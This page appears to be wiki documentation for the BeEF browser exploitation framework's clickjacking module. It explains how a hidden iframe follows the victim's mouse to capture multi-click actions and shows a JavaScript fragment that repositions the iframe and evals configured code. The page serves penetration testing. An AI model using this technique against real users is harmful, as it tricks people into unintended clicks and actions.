Skip to content

Module: Clickjacking

Jump to bottom
Haoxi Tan edited this page Jan 9, 2020 · 3 revisions

Summary

  • Objective: perform basic multi-click clickjacking

  • Authors: Brigette Lundeen, Rich Lundeen

  • Browsers: Firefox, Chrome, IE

  • Code

Internal Working

The iframe follows the mouse, so anywhere the user clicks on the page will be over x-pos,y-pos. The optional JS configuration values specify local Javascript to exectute when a user clicks, allowing the page can give visual feedback. The attack stops when y-pos is set to a non-numeric values (e.g. a dash).

For a demo, visit <beef root>/demos/clickjacking/clickjack_attack.html with the default settings (based on browser they may have to be adjusted).

        function iframeClicked(){
                clicked++;
                var jsfunc = '';
                jsfunc = clicks[clicked-1].js;
                innerPos.top = clicks[clicked].posTop;
                innerPos.left = clicks[clicked].posLeft;
                eval(unescape(jsfunc));
                setTimeout(function(){
                        updateIframePosition();
                }, <%= @clickDelay %>);

                setTimeout(function(){
                        var btnSelector = "#" + elems.btn;
                        var btnObj = $j(btnSelector);
                        $j(btnObj).focus();

                        //check if there are any more actions to perform
                        try {
                                if (isNaN(parseInt(clicks[clicked].posTop))) {
                                        removeAll(elems);
                                        throw "No more clicks.";
                                }
                        } catch(e) {
                                cjLog(e);
                        }
                }, 200);
        }

References

https://en.wikipedia.org/wiki/Clickjacking

Screenshots

User Guide

I. Introduction   |   II. Basic Utilization   |   III. Advanced Utilization   |   IV. Development   |   V. References

Community

Blog   |   Code   |   Youtube   |   Twitter

I - Starting BeEF

  1. Introducing BeEF
  2. Installation
  3. Basics
  4. Troubleshooting

II - Basic Utilization

  1. Configuration
  2. Interface
  3. Information Gathering
  4. Social Engineering
  5. Network Discovery
  6. Metasploit
  7. Tunneling
  8. XSS Rays
  9. Persistence
  10. Creating a Module
  11. Geolocation
  12. Using-BeEF-With-NGROK

III - Advanced Utilization

  1. RESTful API
  2. Autorun Rule Engine
  3. Notifications
  4. Console
  5. WebRTC Extension

IV - Development

  1. Contributing
  2. ActiveRecord
  3. Development Organization
  4. Architecture
  5. BeEF Javascript API
  6. Step By Step Module Creation
  7. Creating a New Extension
  8. BeEF Testing
  9. Browser & OS Compatibility
  10. Database Schema
  11. Development Milestones
  12. Command Module Config
  13. Command Module API

V - References

  1. FAQ
  2. Other
  3. References
  4. Modules
  5. Release Notes
Clone this wiki locally